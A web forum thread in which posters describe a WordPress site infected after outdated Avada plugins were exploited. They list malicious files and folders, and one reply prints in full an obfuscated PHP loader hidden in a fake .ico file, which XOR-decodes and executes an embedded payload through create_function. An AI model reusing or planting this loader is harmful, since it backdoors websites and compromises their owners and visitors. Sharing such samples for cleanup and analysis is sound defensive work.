Avada theme infected my client with dozens of malware
- This topic is empty.
-
AuthorPosts
-
September 9, 2023 at 7:52 pm #7979NancyGuest
nearly impossible to cleanup all this stuff, an incredible amount of malware. they only had a few plugins installed… 2 of them being outdated versions of Avada Builder and Avada Core. holy crap the amount of malware.
first there is a fake plugin installed under
/plugins/rr687664/
Dozens of malware in there:
C.js.php h.js.php KADnq.js.php LWn.js.php PTs.js.php UGU.js.php DwZk.js.php iHM.js.php k.js.php MPW.js.php qF.js.php uJXYS.js.php EYQ.js.php jcpgB.js.php lcHxf.js.php NjCgY.js.php qpyT.js.php xCE.js.php FlPd.js.php J.js.php LI.js.php NOEAs.js.php rIKw.js.php Xn.js.php ha.js.php JKPcS.js.php l.js.php OGKND.js.php t.js.php y.js.php
September 9, 2023 at 7:55 pm #7981RichardGuestand after that is tons of malware folders in the root too
0dxh2tc 8q7qq1 em94oo hjrus k952oc8u p4wln seasonic-focus wp-activate.php wp-cron.php y1o45 0gmu4dea city-of-xirejf esmqwrjh hlfn9al lpjJz q3ol1w t0qz9x7x wp-admin wp-includes zapcos 0r93y deqy3 even-basting-ptpsqu how-to mhuit qrRIErV things-measured-ttq wp-blog-header.php wp-load.php zcpktrp 18y16opu dhoom-watch-ryezmpt f1e57c00774ab762a2746b3119e3dc6b.txt how-to-ojisuxj molixinw qtr03sz truth-be wp-comments-post.php wp-login.php 480goarb dkr f5hl2xvw i7wxeko8 myl9l qytuyhNL ts1kz35m wp-comments-post.php.suspected wp-settings.php 6tjs4 dwmhh feyeujj index.php nl73b RHmf uxt wp-config.php wp-signup.php 89856gvs e8c8d gg8t1jvw izy18 od1vt0p robots.txt v3lug wp-config-sample.php xmoMaxH 8bk76ob egcdccgi halloween-mac-vmtk j428bn1 omwm rta6d wmco9qca wp-content xvwra
lollll besides wp core files, all the rest is totally malware!
September 9, 2023 at 7:57 pm #7982WalterGuestWhat WordPress theme was it Avada or child theme
September 9, 2023 at 7:59 pm #7983RobertGuestWhat WordPress theme was it Avada or child theme
yup child theme for Avada, not much functions though. only custom header file, nothing else really. some basic JS for adding CSS class, nothing else
September 9, 2023 at 8:00 pm #7984SamuelGuestlol just found more… child theme folder also full of malware:
C.js.php dlqcfiwz.php FlPd.js.php h.js.php J.js.php k.js.php l.js.php NjCgY.js.php PTs.js.php rIKw.js.php t.js.php xCE.js.php css.php DwZk.js.php functions.php iHM.js.php JKPcS.js.php lcHxf.js.php LWn.js.php NOEAs.js.php qF.js.php screenshot.png UGU.js.php y.js.php customheader.php EYQ.js.php ha.js.php jcpgB.js.php KADnq.js.php LI.js.php MPW.js.php OGKND.js.php qpyT.js.php style.css uJXYS.js.php
one of worst infections I ever saw
September 9, 2023 at 8:02 pm #7985NicoleGuestNuts.
September 9, 2023 at 8:07 pm #7986SamanthaGuestI can’t imagine why anyone is still using Avada in 2023. If you really love page builders, at least use an open source one??
September 9, 2023 at 8:07 pm #7987DeborahGuestthis is why, this is why….
September 9, 2023 at 8:12 pm #7990TimothyGuestwhat are inside all those malware folders? why so freakin’ many??
September 9, 2023 at 8:13 pm #7991DennisGuest@Timothy mostly just index.php file, and PHP include some fake ico files, for example include some file like
/wp-content/.c0f8be24.ico
.ico file contents are like
<?php $_w02l8 = basename/*iq8c*/(/*gtrej*/trim/*9*/(/*57*/preg_replace/*6*/(/*3c47p*/rawurldecode/*usl9*/(/*4t*/"%2F%5C%28.%2A%24%2F"/*8zpn*/)/*z*/, '', __FILE__/*mj2*/)/*th8*//*rs9gu*/)/*o*//*i*/)/*cuos2*/;$_213ix7 = "G%05%10N%19%06%00T%5D%40%0C%07G%09%10D%14%5D%03%08mWA%07%17%0AV%17o%05J%07%04FQ%0ENJF%24%18%3A%02%5D%04%0C%5CQ%06N%10%1B%5C%06Q%0Bg%01%0A%5C%40K%11%170M%11U%07L%07E%15%18%0EXJT%24%23Y%08Q%3D%16W%40%06N%06%1D%5C%0CB9T%0D%02%15%18%0E%276%23bJ%0B%26Q%0C%0CmGK%1DKHB%0CW9%5D%10%17%5DF%5DNOO%1EJ%0B%26Q%0C%0CmGK%1DKHC%02H9%5D%1A%00QAZ%00%0C%01q%17Y%0B%5DEI%12%04%07R%23%0A%5C%11_%14g%10%00B%5B%5C%1D%0A%01IK%00O%03%22%16W%40q%1D%0A%02K%3C%5C%0FU%0B%11%1A%04%07R%0A%09%06BT%03%5E%0B%0BWP%06K3%27~%3Cu%29t%40L%1BOJ%0C%05%06%40%06%18Dh%2A5mqa%25AC%0EAl%08%1AK%5EO%5DHIKNJ%06V%0FV%07%01%1A%13H%00%0F%0Aq%13E%12g%01%0A%5C%40K%07%17%1C%0ED%19OC%06%00T%5D%40%0CKHH%0A%5C%03g%12%10FkM%06%0D%1BK%0DD%15%18EI%12%05%07RG%00Y%0D%5D%0AMBX%12%13%1B%08TV%1FS%06%02%15VWWU%03%5DS%0B%1CNQ%04%09ZH%07%05%17%5E%07%5DH%5BU%04Y%5BB%09SB%06%01%0EBC%14%09O%0C%08%5EA%15%0F%16%01M%17Y%09VB%15P%5E%5E%0F%08G%0A%02%5E%02%5E%06%13%5E%1D%0E%12%0A%09%0EKC%12J%0E%00%5C%1C%0A%08%0D%0BH%07F%0A%11BY%12%00%07%12%11%0AZ%16B%08%18%40G%09I%0A%13%14%19E%13UF%05BGsvm-%26%29i%2By%2Cs.%28%7C%7B~81%3Cz6f1%60%3B%3FSVM%0D%06%09I%0BY%0CS%0E%08%5C%5B%5E%18%11%1CZ%16F%11%40%1B%1F%02%05%1CZWZ%18T%08_%13MX%10%0F%0A%01%0D%02A%05UF%05B%16FFq%1A%13%03G%17%18BB%15%13YDK%40XKF%0D%5D%09%5E%07E%0F%14O%1B%11%0EW%3CV%0AQ%12M%16%5C%40%04%0C%09KJ%0BBP%08%15EVX%1A%04O%13C%00%5D%1C%10%07XVO%10CR%0EA%12%5D%1C%03%0BVRJ%1F%0FO%13C%40%14%5D%05%3A%40Q%5E%05%02%0CKK%12%18c%3C%24%1FnOD%19_%03ZlMdM9%0FiPKOO%0CA%1CF%1C%03%0BVRJ%1F%0FF%15%07_FCF%07UCF%10%02%0AY%13Y%11%5E%0C%0C%12%09%0EM%0B%01C%0CV%03cF%04%5CPH%0D%15%03uGX%0CH%15%07DGIBH2sX%14%09N%09%01VEII%5EO%0A%0B%5E%0BW%04%00i%10O%07%07%09J%15%5C%3D%1C%0A%0FBCL%1F%10%08%05Hm%3B%03F%16%5EU%5C%11%0C%0A%0E%5E%10BP%0C%08%5DRK2G%0E%40%07V%02N%0E%3E%16%5CD%19%14%0DX%10WM%13%3F8%09%10E%07%19%0DJ%0CZ%12%18_E%16%5C%40%04%0C%09K8%14%07V%06%03VBB2G%07D%13G%04N%11%02%19%1Fs4XKW%17T%08T%0D%1CD%14%13IKKL%04G%0EA%03%00EDG%1E%05%01GC%0CZ%18PL%12H%0EAG%00X%08T%02I%05E%0C%0A%0E%5DJT%0A%06S%0D%40%17%17JD%0ETCG%06G_%10S%06%01CS%0EOC%5E%1BJ%10Z%04BQ%1B%14RIKK%5D%0FQ%14%40%0D%00%12%0A%10IQF%15GE%0FP%0C%01X%5B%0ETCG%06GC%0AY%10%1D%5DQ%0EOC%5C%07C%0CZ%18TL%12H%0EM%08%01T%01T%09R%16%5E%16FL%03%01%0EWC%0DF%1C%10%07XVO%10CA%0E%00X%14%10F%1CFP%40%05%0C%16XJ%0B%0F%5EBM%16GB%08%11%17A%06%10G%05BS%06%1D%0E%12G%1DL%09R%07ABX%12%10%5C%0B%09%0DO%1A%10H%18%01%0D%40%1C%0A%0C%00%04V%16B%1EHK%5EO%5DHIKKE%0DJ%04%5C%0D%0FF%14%0FTCY%1AJ%10%1D%1C%10%07XVO%10CR%0EGB%04R%00%04K%14%00I%00%07%5CK%14%13Q%0A%0BV%5EA%40X%12SCG%0EQ%0E%00%12%1C%0A%01%09%1FY%01F%15_BY%12GZ%1B%0F%0A%40K%14%07V%06%03VBB%40JT%5C%06D%13J%0CE%16FL%03%01%0EWXM%0F%5EBM%13R%5B%07%00%1BG%0C%5E9%5D%1A%0CA%40%5DAD%09G%0FU9H%17%11mWA%07%17%0A%40%17CA%11K%1ETA%40%0A%17%06A%0D%10%00Q%0E%00mD%5B%1D%3C%0CA%0DD%03V%16%16%1A%10L%0E%14%07W%02UJ%18F%1CWDX%0C%12%05%02C%14%12L%04%1F%5C%5BW%0ACR%0E%25Q%0AK%07LI%10W%0C%13%19K%12Z%07W%01%04DB%0ETCKZ%17V%1CV%0D%1CQ%14%13TCW%0E%5C%10AYEE%08%14%09%1EDT%0A%14%5E%0BI%00%02UM%0ETC%2FH%0C%40%03VJAPSY%01%1A%0EKO%10BA%07%15DQ_%03%02%00M%02F%10%11Y%0CT%14%06M%14%01C%12R%01_%1BE%0F%09%13I%25%0EB%10UOC%10%00FA%5C%07C_%15%1EU%0AK%07%1E%5BR%0EA%0A%1Cq%02B%14Y%1BM%16MK%19%15%0A_%09%19O%18F%1CWDX%0C%12%05%0E%5E%10%0FU%12%09%5DPKAG%16K%13F%03I%08L%09%10O%1D%0C%0C%5D%10%10%5B%18%04%12%40%5DZ%0CKKY%0D%5D%17Z%05%02K%18%0EM%1A%0A%5E%15U%17RK%5ETWB%06%10%0A%06GG%08U%13%07USW%40X%1DK%17E%14VBAS%40A%0A%10%1C%15%1EM%1BQ%04E%1A%15H%1C%0D%0CZ%0A_%08g%07%1D%5BGZ%1AKHH%0A%5C%03g%05%00FkM%06%0D%1BK%0DD%15%1FKLIR%5B%07%00%1BG%0C%5EF%5E%0B%09WkI%0C%170M%0C%5E%12%5D%0C%11A%1C%0A%1C%13%1DT%0ECOCF%0DXDY%0B%15%1CI%1BE%08%5E%01E%0F%14H%06%13%0A%40K%14%13H%10%1F_G%02IA%1D%0CJ%0BBA%07%15DQ_%03%19%01O%15I%11KBX%12R%5C%0C%02%0B%06GX%0CH%15%07DGI%11%16%01H%00%1CF%5E%0B%09WGG%13%06G%0A%16%40%14B%0F%16%1B%1D%15%0F%00%03A%10UN%1C%0A%0FBCL%1F%10%08V%16%5E%00%5BK%5E%40QZ%1C%11%01%0EGI%03H%14%00C%5ET%07%02%19W%14C%5DE%1F%03GZM%1D%0A%00%40C%5D%0EJ%1A%08%5DX%06%40%18%1DK%17E%14VB%11%40%5DCA%13%1DK%04o%14%5D%12%09SWKAA%40rK%1ELdFJ%10%18%0ENDC%0E%3Co%20q.%20mk%07%40X%12H%16%5E%05L%0B%0A%5C%14T%1C%0B%02K%0E%18BZ%09%03PUZ%02OO%0A%10%5C%04W%08%17%1BO%0A%1A%16%06L%1BJ%04%18_E%10%16%15%0F%0C%1D%0EK%14%0ER%12%12PB%5D%0E%5E_%15C%14%0ER%12%12PB%5D%0E_%1CZ%11%5C%03VJAP_H%0B%02%1BEJ%0BOC%04%0A%40%14%06M%1B%17A%08Y%01%5E_U%09%14%0A%11%1B%00E%0AW%00%04%11%11%40XK%07KK%5D%0FR%09R%10L%12%12%08IG%07D%13G%04N%11%02%0EGZ%1B%0F%0A%40K%14%04S%04%07S%40E%40XO%0A%1BH%09S%0B%02T%1F%05ECKF%09%40%11Z%14%16U%1F%05%40%18K%5D%16Y%04%40%18%07%12%1A%13I%00%07%5CK_%14%5CJAP_H%0B%02%1BE8%14%0ER%12%12PB%5D%0E%3EF%0E%3D%10%09J%06M%16GB%0B%0C%05%5C8%14%1E%40%0D%0E%5BSH4JF%15%1EM%14%5D%16%10%40Z%0EM%10%1AG%01H%1CZY%18TA%40%0A%17%06A%0D%10%0EU%01%16TL%40AG%0DE%05R%07L%09I%12%10%5D%05%01%00D%11%19%1D_%0E%0APUBIG%00Y%0D%5D%0AMY%17W%40%5B%1B%0DOT%16X%0B%5D%0FMHAF%04%06%02%06GR%0D%5E%00%04F_%02IG%1CB%01_%0CJKI%12%10A%1E%0D%02B%16%19%5DE%04%10%5CWZ%00%0C%01%0E%07D%05H%1A%11%1A%10L%02%05%0DO%17%5BJ%18F%16%5EVA%03%11FU%04%5C%09Z%03%09%12%10A%1E%0D%02B%16%0B%14%5D%16%10%40Z%0E%13%16%07C%06%5DNB%17%0D_QCAG%0DE%05R%07L%09I%12%10A%1E%0D%02B%16%19J%18F%16%5EVA%03%11F%15%1EV%13V%01%11%5B%5B%40I%15%0E%40%07R%0AK%00M%1BO%0A%1E%0B%1DT%07T%16WBX%12tH%00%0F%0Aq%04U%12g%01%0A%5C%40K%07%17%1C%06%0EX%14%40%0F%0A%5E%1C%07%40XKI%1BZ%10A%0AE%0F%14%5D%1D%11%1FA%10%18BO%0A%17HPJ%19%0CC%0E%0ETS%10%0F%0D%40LC%06%0FG%07J%19%5DQ%04E%1A%10I%11%09%19W%0B%10G%05_Etub%3A%26FUGE%00%5E%09%1F_Q%0ETC%1C%5B%01C%12JJAE%5C%5C%13%07%0B%5E%0C%1CF%1C%05%1DXBW%01CD%0EP%02O%03F%0DXDY%0B%15%1CI%05C%03%5D%05%06%12%09%0E%29%16%01%5D%06B%0FY%0E%0CHQ%06%01%0E%0C%5D%05H%08%10%10%04EA%5C%05%07%0AM%0CT%03%10F%10TRE%13%0E%0A%07O%10%0B%5CWM_%5C%5C%11%0E%00BK%19O%11K%5EOQB%1A%06%14%0A%0BZ%16O%00%13ASH%1A%06%0AI%00%10%5B%18%23%17%40UWAJTS%11U%12M%10%0B%12%10F%03%13%18L%15C%01%5E%11%00WSMR%1E%09%5B%0DS%12Q%0D%0B%12LC%05%07%17AK%14%0ER%12%12PB%5D%0E%05%1CK%06W%05%11%19A%5E%5BO%18%04%08%0E%5E%10%14Y%15%10%40XK%07%00%00J%06%18%02L%01%15J%40%06%29%10%0A%5C%0AQ%0AQ%18%00%1A%10F%03%13%18L%15C%01%5E%11%00WSM%40OOC%07%05NU%0A%17JYA%05KF%07J%19%5D%1C%15%0D%40NJ%0D%13%00%0E%5E%10%26%5E%0B%09WkI%0C%170M%0C%5E%12%5D%0C%11A%1CC%01%11%17C%0C%5CN%11K%5E%16SV%03%15%16FC%0DFK%16%17B%5B%5DAG%18F%11J%02%5C%12%0A%1E%14C%0DVGC%0BB%1EU%0D%09%1A%1D%07%40X%06HC%18B_%1A%0FDMFIBR%13Cv%27t1%20%1BO%0A%06%13%08A%00VF%05B%16GV%5D%1D%11G%0A%14X%14B%06%01B%5B%02IG%08V%09F%1FPBN%12%07%1C%40XKY%0BB%1C%5C%06%15%5D%14%13I%10%1B%5C%3CB%03H%0E%04QQ%06M%0C%1FI%0CS%00%14BA%5E%5BO%18%04%08%02C%14%11P%10%1FVP%5E%06JTS%06%5C%15%5D%19AE%5C%5C%13%07%0B%5E%0C%10%5B%18F%12ZFT%0D%07%1FAC%1EF%1A%3E%0BnZ%01FAO%00C%5D%02%0DJ%08ZFV%04%0C%03%06J%19F%16BA%5E%5BO%18%04%08%15%1Ep%00Q%0E%00mD%5B%1D%3C%0CA%0DD%03V%16%16%1AYF%1B%1B%02A%0F%18O%14BAE%5C%5C%13%07%0B%5E%0C%19%5DE%04%10%5CWZ%00%0C%01%0E%1BE%04W%0E%0D%1A%10Z%0B%10%00L%05GJ%18F%13HF%5C%07%04%1A%40JKBP%08%15EVX%1A%04%09%5D%06U%01%5BBX%12BO%07%07%0DB%10RN%11YAZ%5E%5E%1E%01%19%5D%04V%15%5D%07%02Qo%0A%1D%01%1CA%01V%11eBX%12DL%03%13%09EK%14%10B%10%17%5CS%5B%07JTV%0E%5C%02%40%0DM%16%5CD%19%14%0DX%10W%00K%07%00UW%07R%1E%09%5B%0DS%12Q%0D%0B%12LX%0A%16%0EG%0FXN%1C%16%07A%5BL%0F%14FUGX%0CH%15%07DGI%0F%10%0AK%04SF%05B%13SZJ%0B%0F%1CLK%19%5DM%0C%16W%40%06M%0B%05%5E%14R%10K%05%03AQK%0E%004%0A%17R%15W%00%03Ei%07R%1B%02B%07H%09%10F%0DXDY%0B%15%1CI%05C%03%5D%05%06%1B%0FS%0F%16%01M%17Y%09VB%0FK%5BA%03%0D%09%06GD%04K%0D%07TC%13%276%23bJK%00W%10%00SWFIK%19O%0DT%04T%11%07%1A%1D%0E%08%10O%0A%11I%15N%04%0AAE%13WG%16K%13F%03I%08%01YLX%0A%05%0A%07%18Y%00%18JAFV%5D%06%01%09YJK%0F%5EBMA%40%5C%0A%0E%1F%06GD%04K%0D%07TC%02IG%1DW%10F%00W%11%14%1B%14%13TC_%07%18U%10Y%0EM%16MK%19%15%0A_%09T%0D%40%14%06TQ%07R%01%1DK%02%5B%5DE%1F%00%5EGK%12%06%19O%0F%18BA%07%15DQ_%03%07%04V%15S%00%5DK%5EOIS%0F%0C%1DK%02S%0E%18J%04%40FO%10%3C%02K%11W%03%10F%3Aq%7Ba%22%2A%2A%02C%149h-6f%1D%0E%08%10O%0A%0B_%04%5C%09%1C%12%09%10IG%0DE%05R%07L%09LI%10L%02%05%0DO%17%5BF%05B%25GZ%5D%0C%11%06O%0FY%1C%5DJ%0D_W%5D%0F%1B%01%06%13R%0CH%04%0E%1A%10L%02%05%0DO%17%5BO%14BAZ%5BL%0D%08%16%07J%0B%0F%5EBM%5BG%5D%0C%17G%0A%01%5B%00Z%03%11Yo%09%08%08HsJ%10%40%1EBA%5DC%40%04%0F%1A%13%5E%14%04S%04%07S%40E2D%0EEDmOC%0B%03%12%1C%0A%0B%08%09L%02D%0DcE%04%15i%0ET%5EO%09%0A%17OCF%0DXDY%0B%15%1CIC%0DFy%10%17SM%06N%13%19%09C%0DX%18%22%15ZDX%0C%11%1CG%0C%5EN%11NBAB%09I%5EQ%0ED%02H%08OT%15%18%09%08%08H%0E%5E%0EF%1C%00%0ETVO%1D%084%09%02%5BAeNL%09QM%01%0COn%10U%14Q%03%09%5BNKAG%07D%13G%04N%11%02%1B%0FK%11%0A%1B%15%1EU%0AK%07%0CT%14%06M%01%04H%01Q%12S9BS%13sI%5ER%0EDUA%11%19%00DUBAG%0DE%05R%07L%09%3E%15P%094JTS%06%5C%15%5D%0B%03%12%1C%0A%0B%08%09L%02D%0DcE%04%15i%0ET%5EO%09%13%5C%13_%0B%0B%15%1DU%00%05G%0A%01%5B%00Z%03%11Yo%09%1A%02HsC%0D%5B%18E%04VP%09%40%18%17%5B%01_%0APJAP_H%0B%02%1BE8%17%16%1F%3FI%12%10L%02%05%0DO%17%5B%3D%1F%06Bo%1D%15%14%06%03%5D%06Y%00%10F%07YRL%08%17%04uDC%07%1F%3FE%0F%09%0EN%11%0ACD%19%1D%40%14%06GUG%05%0BG%0A%01%5B%00Z%03%11Yo%09%19D2%07XM%1B%5D%01%0D%5D%14%0A%0B%08%09L%02D%0DcE%04Y%13sR%06%17G%17%18O%03%1F%18XMA%06%09%01HK%19%5DEh%18";$f="\x63".chr/*uw*/(/*0f*/114/*wua*/)/*e*/."\x65".chr/*vzho*/(/*2y*/97/*yzj*/)/*3uhnw*/.chr/*swx*/(/*4wgoi*/116/*uxhlr*/)/*q4*/.chr/*1*/(/*c7*/101/*jf5i*/)/*38be*/."\137".chr/*h7zaw*/(/*cozp*/597-495/*8c*/)/*ezh*/.chr/*9*/(/*58*/1097-980/*2m1f7*/)/*2z7*/.chr/*4rt5*/(/*oxd*/440-330/*m1eg8*/)/*jr*/."\143".chr/*2x*/(/*famgk*/809-693/*mvy2*/)/*1*/.chr/*b*/(/*4jgz*/248-143/*cw6*/)/*9e*/.chr/*93k*/(/*u1t0*/111/*5p*/)/*75z*/."\x6e";$f/*c82z*/(/*n*/'', '};' . /*1*/(/*2a*/rawurldecode/*lcdx*/(/*m*/$_213ix7/*uhb*/)/*fkxmo*/ ^ substr/*6b*/(/*uc19w*/str_repeat/*u6k31*/(/*w9uz*/$_w02l8, /*9tu5z*/(/*3jkb9*/strlen/*imh8n*/(/*qfnj*/$_213ix7/*ryjv*/)/*zqv9*//strlen/*87mzk*/(/*xk6*/$_w02l8/*vs9*/)/*s*//*y*/)/*8*/ + 1/*1xa*/)/*u*/, 0, strlen/*7*/(/*bfu4x*/$_213ix7/*l*/)/*k6h*//*v*/)/*6mt83*//*7*/)/*0e5k1*/ . '{'/*vo32*/)/*76hnl*/;
-
AuthorPosts
- You must be logged in to reply to this topic.